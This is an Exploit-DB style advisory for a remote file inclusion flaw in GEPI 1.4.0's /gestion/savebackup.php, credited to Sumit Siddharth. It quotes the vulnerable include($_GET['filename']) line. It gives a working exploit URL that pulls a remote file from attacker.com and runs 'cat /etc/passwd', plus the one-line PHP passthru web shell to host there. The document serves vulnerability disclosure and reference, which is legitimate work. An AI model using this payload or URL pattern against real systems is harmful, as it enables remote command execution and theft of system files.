GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion

Author: Sumit Siddharth
type: webapps
platform: php
port: 
date_added: 2006-10-30  
date_updated: 2016-09-14  
verified: 1  
codes: OSVDB-32631;CVE-2006-5669  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comgepi-1.4.0.tar.gz  

raw file: 2692.txt  
Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]